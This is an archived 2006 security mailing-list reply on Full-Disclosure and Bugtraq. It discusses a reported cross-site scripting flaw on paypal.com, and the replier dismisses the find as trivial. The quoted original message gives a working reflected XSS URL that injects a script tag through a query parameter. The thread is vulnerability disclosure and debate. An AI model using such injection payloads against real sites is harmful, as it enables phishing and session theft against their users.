[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <44C35C20.1030300@heapoverflow.com>
Date: Sun, 23 Jul 2006 13:23:12 +0200
From: "ad@...poverflow.com" <ad@...poverflow.com>
To: Pigrelax@...dex.ru
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: news XSS on paypal.com
I wonder what is interesting in this , usually a poc show us we can
upload a crafted webpage on a vulnerable website, fake a whole webpage,
etc, this link doesnt speak much than the noob who found it.
Pigrelax wrote:
> Hi!
> >From Russia Security Site:
> http://www.securitylab.ru/news/270837.php
>
> New worked XSS on paypal.com:
> www.paypal.com/cgi-bin/webscr?cmd=p/gen/--></script><script>alert('www.securitylab.ru')</script>
>
> really work :)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> __________ NOD32 1.1674 (20060722) Information __________
>
> This message was checked by NOD32 antivirus system.
> part000.txt - is OK
>
> http://www.eset.com
>
>
>
>
View attachment "ad.vcf" of type "text/x-vcard" (167 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists